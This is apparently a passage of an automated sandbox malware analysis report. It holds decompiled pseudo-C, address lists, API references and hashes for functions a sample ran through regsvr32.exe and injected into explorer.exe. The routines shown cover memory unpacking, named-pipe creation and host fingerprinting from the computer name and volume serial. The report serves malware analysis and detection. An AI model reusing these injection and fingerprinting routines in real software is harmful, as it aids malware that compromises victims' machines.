								 *_v40 =  *_v40 + _v56;
							}
						} else {
							 *_v40 =  *_v40 + _v56;
						}
						_v32 =  &(_v32[1]);
					}
					_v44 = _v32;
				}
				goto L13;
			}

0x000f2b33
0x000f2b39
0x000f2b42
0x000f2b45
0x000f2b48
0x00000000
0x000f2c39
0x000f2c3d
0x000f2c3f
0x000f2c4d
0x000f2d6b
0x000f2d74
0x000f2d77
0x000f2d7b
0x000f2d81
0x000f2d89
0x000f2d89
0x000f2d91
0x00000000
0x000f2d9c
0x000f2c53
0x000f2c5c
0x000f2c6a
0x000f2c6d
0x000f2c8a
0x000f2c91
0x000f2ca3
0x000f2ca3
0x000f2caa
0x000f2cba
0x000f2cd2
0x000f2cbc
0x000f2cc4
0x000f2cc4
0x000f2cd5
0x000f2cd9
0x000f2ce9
0x000f2d0c
0x000f2d1e
0x000f2ceb
0x000f2cff
0x000f2cff
0x000f2d28
0x000f2d44
0x000f2d2a
0x000f2d39
0x000f2d39
0x000f2d4c
0x000f2d55
0x000f2d55
0x000f2d63
0x00000000
0x000f2cac
0x000f2cae
0x00000000
0x000f2cae
0x000f2caa
0x00000000
0x000f2c6d
0x000f2b50
0x000f2b5e
0x000f2b63
0x000f2b6e
0x000f2b71
0x000f2b75
0x000f2b77
0x000f2b87
0x000f2b90
0x000f2b99
0x000f2ba1
0x000f2baa
0x000f2bb5
0x000f2bbb
0x000f2bbe
0x000f2bc1
0x000f2bc8
0x000f2bcf
0x00000000
0x00000000
0x000f2bda
0x000f2be8
0x000f2bf3
0x000f2bfd
0x000f2c15
0x000f2c22
0x000f2c22
0x000f2bff
0x000f2c0a
0x000f2c0a
0x000f2c29
0x000f2c29
0x000f2c31
0x000f2c31
0x00000000

APIs

GetModuleHandleA.KERNEL32(?), ref: 000F2C84
LoadLibraryA.KERNEL32(?), ref: 000F2C9D
GetProcAddress.KERNEL32(00000000,890CC483), ref: 000F2CF9
GetProcAddress.KERNEL32(00000000,?), ref: 000F2D18

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID:
API String ID: 384173800-0
Opcode ID: c591a937c47f087bb16fdf42455c241f93725c9f97164c2521e82073c7c85332
Instruction ID: c13494c08b7c6d10ed52be5bf520a493599db5ee96942a2c9c83ad8c885846d0
Opcode Fuzzy Hash: c591a937c47f087bb16fdf42455c241f93725c9f97164c2521e82073c7c85332
Instruction Fuzzy Hash: CDA18B75A00209EFCB54CFA8C885AADBBF0FF08314F148569E915EB791D734A981DF64

Uniqueness

Uniqueness Score: -1.00%

Function 000E1C51, Relevance: 6.1, APIs: 4, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E000E1C51(signed int __ecx, void* __eflags, void* __fp0) {
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				void* _t13;
				intOrPtr _t15;
				signed int _t16;
				intOrPtr _t17;
				signed int _t18;
				char _t20;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t51;
				signed int _t61;
				signed int _t64;
				void* _t71;

				_t71 = __fp0;
				_t61 = __ecx;
				_t41 =  *0xfe6dc; // 0x1d4
				_t13 = E000EA501(_t41, 0);
				while(_t13 < 0) {
					E000E97ED( &_v28);
					_t43 =  *0xfe6e0; // 0x0
					_t15 =  *0xfe6e4; // 0x0
					_t41 = _t43 + 0xe10;
					asm("adc eax, ebx");
					__eflags = _t15 - _v24;
					if(__eflags > 0) {
						L9:
						_t16 = 0xfffffffe;
						L13:
						return _t16;
					}
					if(__eflags < 0) {
						L4:
						_t17 =  *0xfe684; // 0x25bf8f0
						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0xfe6d0, 0);
						__eflags = _t18;
						if(_t18 == 0) {
							break;
						}
						_t35 =  *0xfe684; // 0x25bf8f0
						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
						_t41 =  *0xfe6dc; // 0x1d4
						__eflags = 0;
						_t13 = E000EA501(_t41, 0);
						continue;
					}
					__eflags = _t41 - _v28;
					if(_t41 >= _v28) {
						goto L9;
					}
					goto L4;
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t20 =  *0xfe6e8; // 0x25bffd0
				_v28 = _t20;
				_t22 = E000EA6EB(_t41, _t61,  &_v16);
				_v20 = _t22;
				if(_t22 != 0) {
					_t23 = GetCurrentProcess();
					_t24 = GetCurrentThread();
					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0xfe6d0, 0, 0, 2);
					E000E97ED(0xfe6e0);
					_t64 = E000E1A01( &_v28, E000E1226, _t71);
					__eflags = _t64;
					if(_t64 >= 0) {
						_push(0);
						_push( *0xfe760);
						_t51 = 0x27;
						E000E9ED1(_t51);
					}
				} else {
					_t64 = _t61 | 0xffffffff;
				}
				_t29 =  *0xfe684; // 0x25bf8f0
				 *((intOrPtr*)(_t29 + 0x30))( *0xfe6d0);
				_t48 =  *0xfe6dc; // 0x1d4
				 *0xfe6d0 = 0;
				E000EA51D(_t48);
				E000E85FB( &_v24, 0);
				_t16 = _t64;
				goto L13;
			}

0x000e1c51
0x000e1c5e
0x000e1c60
0x000e1c67
0x000e1ccd
0x000e1c74
0x000e1c79
0x000e1c7f
0x000e1c84
0x000e1c8a
0x000e1c8c
0x000e1c90
0x000e1cfe
0x000e1d00
0x000e1d82
0x000e1d88
0x000e1d88
0x000e1c92
0x000e1c9a
0x000e1c9a
0x000e1ca6
0x000e1cac
0x000e1cae
0x00000000
0x00000000
0x000e1cb0
0x000e1cba
0x000e1cc0
0x000e1cc6
0x000e1cc8
0x00000000
0x000e1cc8
0x000e1c94
0x000e1c98
0x00000000
0x00000000
0x00000000
0x000e1c98
0x000e1cd7
0x000e1cd8
0x000e1cd9
0x000e1cda
0x000e1cdb
0x000e1ce0
0x000e1cea
0x000e1cef
0x000e1cf7
0x000e1d12
0x000e1d15
0x000e1d1f
0x000e1d2a
0x000e1d3d
0x000e1d3f
0x000e1d41
0x000e1d43
0x000e1d44
0x000e1d4c
0x000e1d4d
0x000e1d53
0x000e1cf9
0x000e1cf9
0x000e1cf9
0x000e1d54
0x000e1d5f
0x000e1d62
0x000e1d68
0x000e1d6e
0x000e1d79
0x000e1d80
0x00000000

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca6858781c492180b8de1e5046c0a756d2d560a65dbfa71ab10ce06ae47a9bb8
Instruction ID: e36e1d4da5a8b66414fb10ca42b646ab2c62429110dfd3c5fb1e86f019a3c1c8
Opcode Fuzzy Hash: ca6858781c492180b8de1e5046c0a756d2d560a65dbfa71ab10ce06ae47a9bb8
Instruction Fuzzy Hash: 0031E8327082C89FE354EF66EC858BA779AEB58394B10052AF601E75B2DF34AD04D752

Uniqueness

Uniqueness Score: -1.00%

Function 000E1B16, Relevance: 6.1, APIs: 4, Instructions: 97
threadCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E000E1B16(void* __eflags, void* __fp0) {
				char _v24;
				char _v28;
				void* _t12;
				intOrPtr _t14;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t19;
				void* _t20;
				char _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t33;
				intOrPtr _t38;
				intOrPtr _t40;
				void* _t41;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t51;
				void* _t61;
				void* _t71;

				_t71 = __fp0;
				_t38 =  *0xfe6f4; // 0x1d0
				_t12 = E000EA501(_t38, 0);
				while(_t12 < 0) {
					E000E97ED( &_v28);
					_t40 =  *0xfe700; // 0x0
					_t14 =  *0xfe704; // 0x0
					_t41 = _t40 + 0x3840;
					asm("adc eax, ebx");
					__eflags = _t14 - _v24;
					if(__eflags > 0) {
						L13:
						_t15 = 0;
					} else {
						if(__eflags < 0) {
							L4:
							_t16 =  *0xfe684; // 0x25bf8f0
							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0xfe6ec, 0);
							__eflags = _t17;
							if(_t17 == 0) {
								break;
							} else {
								_t33 =  *0xfe684; // 0x25bf8f0
								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
								_t51 =  *0xfe6f4; // 0x1d0
								__eflags = 0;
								_t12 = E000EA501(_t51, 0);
								continue;
							}
						} else {
							__eflags = _t41 - _v28;
							if(_t41 >= _v28) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
					L12:
					return _t15;
				}
				E000E97ED(0xfe700);
				_t19 = GetCurrentProcess();
				_t20 = GetCurrentThread();
				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0xfe6ec, 0, 0, 2);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 =  *0xfe6e8; // 0x25bffd0
				_v28 = _t24;
				_t61 = E000E1A01( &_v28, E000E1310, _t71);
				if(_t61 >= 0) {
					_push(0);
					_push( *0xfe760);
					_t48 = 0x27;
					E000E9ED1(_t48);
				}
				if(_v24 != 0) {
					E000E6871( &_v24);
				}
				_t26 =  *0xfe684; // 0x25bf8f0
				 *((intOrPtr*)(_t26 + 0x30))( *0xfe6ec);
				_t28 =  *0xfe758; // 0x0
				 *0xfe6ec = 0;
				_t29 =  !=  ? 1 : _t28;
				_t46 =  *0xfe6f4; // 0x1d0
				 *0xfe758 =  !=  ? 1 : _t28;
				E000EA51D(_t46);
				_t15 = _t61;
				goto L12;
			}

0x000e1b16
0x000e1b1c
0x000e1b2a
0x000e1b98
0x000e1b37
0x000e1b3c
0x000e1b42
0x000e1b47
0x000e1b4d
0x000e1b4f
0x000e1b53
0x000e1c4d
0x000e1c4d
0x000e1b59
0x000e1b59
0x000e1b65
0x000e1b65
0x000e1b71
0x000e1b77
0x000e1b79
0x00000000
0x000e1b7b
0x000e1b7b
0x000e1b85
0x000e1b8b
0x000e1b91
0x000e1b93
0x00000000
0x000e1b93
0x000e1b5b
0x000e1b5b
0x000e1b5f
0x00000000
0x00000000
0x00000000
0x00000000
0x000e1b5f
0x000e1b59
0x000e1c46
0x000e1c4c
0x000e1c4c
0x000e1ba1
0x000e1bb5
0x000e1bb8
0x000e1bc2
0x000e1bce
0x000e1bd8
0x000e1bd9
0x000e1bda
0x000e1bdb
0x000e1be0
0x000e1be9
0x000e1bed
0x000e1bef
0x000e1bf0
0x000e1bf8
0x000e1bf9
0x000e1bff
0x000e1c04
0x000e1c0a
0x000e1c0a
0x000e1c0f
0x000e1c1a
0x000e1c1d
0x000e1c25
0x000e1c31
0x000e1c34
0x000e1c3a
0x000e1c3f
0x000e1c44
0x00000000

APIs

GetCurrentProcess.KERNEL32(000FE6EC,00000000,00000000,00000002), ref: 000E1BB5
GetCurrentThread.KERNEL32(00000000), ref: 000E1BB8
GetCurrentProcess.KERNEL32(00000000), ref: 000E1BBF
DuplicateHandle.KERNEL32 ref: 000E1BC2

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: Current$Process$DuplicateHandleThread
String ID:
API String ID: 3566409357-0
Opcode ID: 825406e666a0d464585d2f3727356814a3918950ffdf50f8468835589844cac2
Instruction ID: f1602bb974fda614ae956cd84997c5a4f562cec7b4244b2c74135ff6e4a3168f
Opcode Fuzzy Hash: 825406e666a0d464585d2f3727356814a3918950ffdf50f8468835589844cac2
Instruction Fuzzy Hash: 6131C7756043C49FE704EF76EC859BA77A5EB68390B140428F611D79B2DF34AC04EB52

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exe PID: 2956 Parent PID: 2568 regsvr32.exeCOMMON

Executed Functions

Function 6CC08D44, Relevance: 13.8, APIs: 9, Instructions: 318
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,00000888,00003000,00000040,00000888,6CC08790), ref: 6CC08E01
VirtualAlloc.KERNEL32(00000000,0000016F,00003000,00000040,6CC087F6), ref: 6CC08E38
VirtualAlloc.KERNEL32(00000000,00022F48,00003000,00000040), ref: 6CC08E98
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6CC08ECE
VirtualProtect.KERNEL32(6CB00000,00000000,00000004,6CC08D23), ref: 6CC08FD3
VirtualProtect.KERNEL32(6CB00000,00001000,00000004,6CC08D23), ref: 6CC08FFA
VirtualProtect.KERNEL32(00000000,?,00000002,6CC08D23), ref: 6CC090C7
VirtualProtect.KERNEL32(00000000,?,00000002,6CC08D23,?), ref: 6CC0911D
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6CC09139

Memory Dump Source

Source File: 0000000D.00000002.723799792.000000006CC08000.00000040.00020000.sdmp, Offset: 6CC08000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6cc08000_regsvr32.jbxd

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 00ab6cab5128f1b70d3fc146b5e93990a19c913ce9501952dd03dc86e75d55b8
Instruction ID: 70efaa665b8edb30936c39bfc55cae7a89093142218af3d041b795f58bd5dc2e
Opcode Fuzzy Hash: 00ab6cab5128f1b70d3fc146b5e93990a19c913ce9501952dd03dc86e75d55b8
Instruction Fuzzy Hash: BAD16C72600200DFDB15CF94C888F9277A6FF48714B294195ED89AFB5AE7B1AC01CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 6CB41320, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 200
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNEL32(000000FF,6CC0878C,RQ@,00000040,?), ref: 6CB41518
GetWindowsDirectoryW.KERNEL32(6CC07810,0000086F), ref: 6CB415E0

Strings

RQ@, xrefs: 6CB4150C, 6CB4150F
@, xrefs: 6CB4133C
1, xrefs: 6CB41327
', xrefs: 6CB4132E

Memory Dump Source

Source File: 0000000D.00000002.723719221.000000006CB21000.00000020.00020000.sdmp, Offset: 6CB21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6cb21000_regsvr32.jbxd

Similarity

API ID: DirectoryProtectVirtualWindows
String ID: '$1$@$RQ@
API String ID: 2764058431-577489365
Opcode ID: 2d7dc5e83e32a8d808fd15f761b272a02e2e951a6a806ddbb19bdbf8fc7fa8a2
Instruction ID: 576e199af8bc79edcab7f51293370d413fbeea0332d757603724047aae0f78b4
Opcode Fuzzy Hash: 2d7dc5e83e32a8d808fd15f761b272a02e2e951a6a806ddbb19bdbf8fc7fa8a2
Instruction Fuzzy Hash: 80A13D74B04549DFCB08DF69C290AACBBF5FB85308F1582AED8059B386D335AB85DB11

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: explorer.exe PID: 2300 Parent PID: 2956 explorer.exeCOMMON

Executed Functions

Function 00085A54, Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00085A54(void* __eflags) {
				intOrPtr _t2;
				void* _t6;
				void* _t7;

				_t2 =  *0x9e684; // 0x14df8f0
				 *((intOrPtr*)(_t2 + 0x108))(1, E000859F9);
				E00085624(_t6, _t7); // executed
				return 0;
			}

0x00085a54
0x00085a60
0x00085a66
0x00085a6d

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,000859F9,00085CC9), ref: 00085A60

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: ef439f24643142f30ec426e0d8420abdc7ec358e2698ae67b416429a4cdf0c43
Instruction ID: 6cd5b5b2112386cd2885f80d60f64b4329ce55269d8079d3ff9981e99a896e8b
Opcode Fuzzy Hash: ef439f24643142f30ec426e0d8420abdc7ec358e2698ae67b416429a4cdf0c43
Instruction Fuzzy Hash: 63B092362405009AD640B760CC0AA9432907F20703F0100A0B2C4CA0A3DED048808741

Uniqueness

Uniqueness Score: -1.00%

Function 000849FE, Relevance: 10.8, APIs: 7, Instructions: 285
stringpipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E000849FE(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				char _v516;
				void _v1044;
				char _v1076;
				signed int _v1080;
				signed int _v1096;
				WCHAR* _v1100;
				intOrPtr _v1104;
				signed int _v1108;
				CHAR* _v1112;
				char _v1116;
				void* __esi;
				intOrPtr _t66;
				CHAR* _t73;
				signed int _t75;
				intOrPtr _t76;
				signed int _t80;
				signed int _t81;
				WCHAR* _t87;
				void* _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				WCHAR* _t96;
				CHAR* _t106;
				void* _t108;
				intOrPtr _t109;
				signed char _t116;
				WCHAR* _t118;
				void* _t122;
				signed int _t123;
				intOrPtr _t125;
				void* _t128;
				void* _t129;
				WCHAR* _t130;
				void* _t134;
				void* _t141;
				void* _t143;
				WCHAR* _t145;
				signed int _t153;
				void* _t154;
				void* _t178;
				signed int _t180;
				void* _t181;
				void* _t183;
				void* _t187;
				signed int _t188;
				WCHAR* _t190;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t196;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t202;
				intOrPtr* _t203;
				void* _t208;

				_t208 = __fp0;
				_push(_t191);
				_t128 = __edx;
				_t187 = __ecx;
				_t192 = _t191 | 0xffffffff;
				memset( &_v1044, 0, 0x20c);
				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
				_v1108 = 1;
				if(_t187 != 0) {
					_t123 =  *0x9e688; // 0xb0000
					_t125 =  *0x9e68c; // 0x14dfab8
					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
				}
				if(E0008BBCF(_t187) != 0) {
					L4:
					_t134 = _t128; // executed
					_t66 = E0008B7EA(_t134,  &_v516); // executed
					_push(_t134);
					_v1104 = _t66;
					E0008B6BF(_t66,  &_v1076, _t206, _t208);
					_t129 = E000849BA( &_v1076,  &_v1076, _t206);
					_t141 = E0008D442( &_v1076, E0008C3BB( &_v1076), 0);
					E0008B8CC(_t141,  &_v1100, _t208);
					_t175 =  &_v1076;
					_t73 = E00082C82(_t187,  &_v1076, _t206, _t208); // executed
					_v1112 = _t73;
					_t143 = _t141;
					if(_t73 != 0) {
						_push(0);
						_push(_t129);
						_push("\\");
						_t130 = E000892C6(_t73);
						_t200 = _t199 + 0x10;
						_t75 =  *0x9e688; // 0xb0000
						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
							L12:
							__eflags = _v1108;
							if(__eflags != 0) {
								_t76 = E000891C4(_v1112);
								_t145 = _t130;
								 *0x9e740 = _t76;
								 *0x9e738 = E000891C4(_t145);
								L17:
								_push(_t145);
								_t80 = E00089B24( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100); // executed
								_t188 = _t80;
								_t201 = _t200 + 0x10;
								__eflags = _t188;
								if(_t188 == 0) {
									goto L41;
								}
								_push(0x9b9c6);
								E00089F13(0xe); // executed
								E00089F37(_t188, _t208, _t130); // executed
								_t194 = _a4;
								_v1096 = _v1096 & 0x00000000;
								_push(2);
								_v1100 =  *_t194;
								_push(8);
								_push( &_v1100);
								_t178 = 0xb; // executed
								E0008A076(_t188, _t178, _t208); // executed
								_t179 =  *(_t194 + 0x10);
								_t202 = _t201 + 0xc;
								__eflags =  *(_t194 + 0x10);
								if( *(_t194 + 0x10) != 0) {
									E0008A3D8(_t188, _t179, _t208);
								}
								_t180 =  *(_t194 + 0xc);
								__eflags = _t180;
								if(_t180 != 0) {
									E0008A3D8(_t188, _t180, _t208); // executed
								}
								_t87 = E000897ED(0);
								_push(2);
								_v1100 = _t87;
								_t153 = _t188;
								_push(8);
								_v1096 = _t180;
								_push( &_v1100);
								_t181 = 2; // executed
								_t89 = E0008A076(_t153, _t181, _t208); // executed
								_t203 = _t202 + 0xc;
								__eflags = _v1108;
								if(_v1108 == 0) {
									_t153 =  *0x9e688; // 0xb0000
									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t90 = E0008FC57(_t89, _t181, _t208, 0, _t130, 0);
										_t203 = _t203 + 0xc;
										goto L26;
									}
									_t153 = _t153 + 0x228;
									goto L25;
								} else {
									_t91 =  *0x9e688; // 0xb0000
									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t91 + 0x1898) & 0x00000082;
										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
											_t183 = 0x64;
											E0008E280(_t183);
										}
										E000852B3( &_v1076, _t208);
										_t190 = _a8;
										_t154 = _t153;
										__eflags = _t190;
										if(_t190 != 0) {
											_t94 =  *0x9e688; // 0xb0000
											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
												lstrcpyW(_t190, _t130);
											} else {
												_t96 = E0008109A(_t154, 0x228);
												_v1100 = _t96;
												lstrcpyW(_t190, _t96);
												E000885B6( &_v1100);
												 *_t203 = "\"";
												lstrcatW(_t190, ??);
												lstrcatW(_t190, _t130);
												lstrcatW(_t190, "\"");
											}
										}
										_t93 = _a12;
										__eflags = _t93;
										if(_t93 != 0) {
											 *_t93 = _v1104;
										}
										_t192 = 0;
										__eflags = 0;
										goto L41;
									}
									_t51 = _t91 + 0x228; // 0xb0228
									_t153 = _t51;
									L25:
									_t90 = E00085532(_t153, _t130, __eflags);
									L26:
									__eflags = _t90;
									if(_t90 >= 0) {
										_t91 =  *0x9e688; // 0xb0000
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t192);
									goto L41;
								}
							}
							_t106 = E0008C2D4(_v1104, __eflags);
							_v1112 = _t106;
							_t108 = CreateNamedPipeA(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t108 - _t192;
							if(_t108 != _t192) {
								_t109 =  *0x9e684; // 0x14df8f0
								 *((intOrPtr*)(_t109 + 0x30))();
								E000885FB( &_v1116, _t192);
								_t145 = _t108;
								goto L17;
							}
							E000885FB( &_v1112, _t192);
							_t81 = 1;
							goto L42;
						}
						_t116 =  *(_t75 + 0x1898);
						__eflags = _t116 & 0x00000004;
						if((_t116 & 0x00000004) == 0) {
							__eflags = _t116;
							if(_t116 != 0) {
								goto L12;
							}
							L11:
							E0008E2C8(_v1112, _t175); // executed
							goto L12;
						}
						_v1080 = _v1080 & 0x00000000;
						_t118 = E000895C2(_t143, 0x879);
						_v1100 = _t118;
						_t175 = _t118;
						E0008C02E(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
						E000885B6( &_v1100);
						_t200 = _t200 + 0x14;
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t122 = E00082B97( &_v1044, _t192, 0x105); // executed
					_t206 = _t122;
					if(_t122 == 0) {
						L41:
						_t81 = _t192;
						L42:
						return _t81;
					}
					goto L4;
				}
			}

0x000849fe
0x00084a0b
0x00084a16
0x00084a1b
0x00084a1d
0x00084a20
0x00084a25
0x00084a28
0x00084a32
0x00084a34
0x00084a41
0x00084a4a
0x00084a4a
0x00084a57
0x00084a72
0x00084a79
0x00084a7b
0x00084a80
0x00084a85
0x00084a8b
0x00084a9a
0x00084ab9
0x00084abb
0x00084ac1
0x00084ac7
0x00084acc
0x00084ad0
0x00084ad3
0x00084add
0x00084adf
0x00084ae0
0x00084aeb
0x00084aed
0x00084af0
0x00084af5
0x00084afc
0x00084b51
0x00084b51
0x00084b56
0x00084bbd
0x00084bc2
0x00084bc4
0x00084bce
0x00084bd3
0x00084bd3
0x00084be8
0x00084bed
0x00084bef
0x00084bf2
0x00084bf4
0x00000000
0x00000000
0x00084bfa
0x00084c04
0x00084c0d
0x00084c12
0x00084c15
0x00084c1b
0x00084c21
0x00084c29
0x00084c2b
0x00084c2e
0x00084c2f
0x00084c34
0x00084c37
0x00084c3a
0x00084c3c
0x00084c40
0x00084c40
0x00084c45
0x00084c48
0x00084c4a
0x00084c4e
0x00084c4e
0x00084c55
0x00084c5a
0x00084c5c
0x00084c60
0x00084c62
0x00084c68
0x00084c6c
0x00084c6f
0x00084c70
0x00084c75
0x00084c78
0x00084c7d
0x00084ca5
0x00084cab
0x00084cb2
0x00084cc1
0x00084cc6
0x00000000
0x00084cc6
0x00084cb4
0x00000000
0x00084c7f
0x00084c7f
0x00084c84
0x00084c8b
0x00084cd0
0x00084cd0
0x00084cd7
0x00084cdb
0x00084cdc
0x00084cdc
0x00084ce6
0x00084ceb
0x00084cee
0x00084cef
0x00084cf1
0x00084cf3
0x00084cf8
0x00084cff
0x00084d42
0x00084d01
0x00084d06
0x00084d0e
0x00084d12
0x00084d1d
0x00084d28
0x00084d30
0x00084d34
0x00084d3c
0x00084d3c
0x00084cff
0x00084d48
0x00084d4b
0x00084d4d
0x00084d53
0x00084d53
0x00084d55
0x00084d55
0x00000000
0x00084d55
0x00084c8d
0x00084c8d
0x00084c93
0x00084c95
0x00084c9a
0x00084c9a
0x00084c9c
0x00084ccb
0x00000000
0x00084ccb
0x00084c9e
0x00084ad7
0x00084ad7
0x00000000
0x00084ad7
0x00084c7d
0x00084b5c
0x00084b6a
0x00084b82
0x00084b88
0x00084b8a
0x00084ba2
0x00084ba7
0x00084bb0
0x00084bb6
0x00000000
0x00084bb6
0x00084b92
0x00084b9b
0x00000000
0x00084b9b
0x00084afe
0x00084b04
0x00084b06
0x00084b44
0x00084b46
0x00000000
0x00000000
0x00084b48
0x00084b4c
0x00000000
0x00084b4c
0x00084b08
0x00084b12
0x00084b1e
0x00084b29
0x00084b30
0x00084b3a
0x00084b3f
0x00000000
0x00084b3f
0x00084ad5
0x00000000
0x00084a59
0x00084a64
0x00084a6a
0x00084a6c
0x00084d57
0x00084d57
0x00084d59
0x00084d5f
0x00084d5f
0x00000000
0x00084a6c

APIs

memset.MSVCRT ref: 00084A20
CreateNamedPipeA.KERNEL32(00000000,00080003,00000006,000000FF,00000400,00000400,00000000,00000000), ref: 00084B82
lstrcpyW.KERNEL32(00000000,00000000), ref: 00084D12
lstrcatW.KERNEL32 ref: 00084D30
lstrcatW.KERNEL32 ref: 00084D34
lstrcatW.KERNEL32 ref: 00084D3C
lstrcpyW.KERNEL32(00000000,00000000), ref: 00084D42

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$CreateNamedPipememset
String ID:
API String ID: 2307407751-0
Opcode ID: 1352ea11be8c8ae72264d39042075a8b10d6d44ec1613a8716ef4fe3f65e2d20
Instruction ID: e76d409b8c8071987b9e0de827397f60ed50a71a08a5218eb30aa035da2c9028
Opcode Fuzzy Hash: 1352ea11be8c8ae72264d39042075a8b10d6d44ec1613a8716ef4fe3f65e2d20
Instruction Fuzzy Hash: 2591CC71604302AFE754FB20DC86BBE77E9BB84720F14492EF5D58B292EB74D9048B52

Uniqueness

Uniqueness Score: -1.00%

Function 0008B7EA, Relevance: 9.1, APIs: 6, Instructions: 83
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E0008B7EA(WCHAR* __ecx, void* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				memset(__edx, 0, 0x100);
				_v12 = 0x100;
				GetComputerNameW( &_v528,  &_v12);
				lstrcpynW(_t43,  &_v528, 0x100);
				_t27 = E000895C2(_t44, 0xa88);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E000885B6( &_v16);
				_t33 = E0008C3D4(_t43);
				E00089621( &(_t43[E0008C3D4(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E0008C3D4(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E0008D442(_t43, E0008C3D4(_t43) + _t40, 0);
			}

0x0008b7ea
0x0008b7f3
0x0008b7ff
0x0008b805
0x0008b807
0x0008b80f
0x0008b822
0x0008b831
0x0008b83c
0x0008b849
0x0008b863
0x0008b868
0x0008b86a
0x0008b871
0x0008b881
0x0008b892
0x0008b89c
0x0008b8a4
0x0008b8ab
0x0008b8ae
0x0008b8cb

APIs

memset.MSVCRT ref: 0008B807
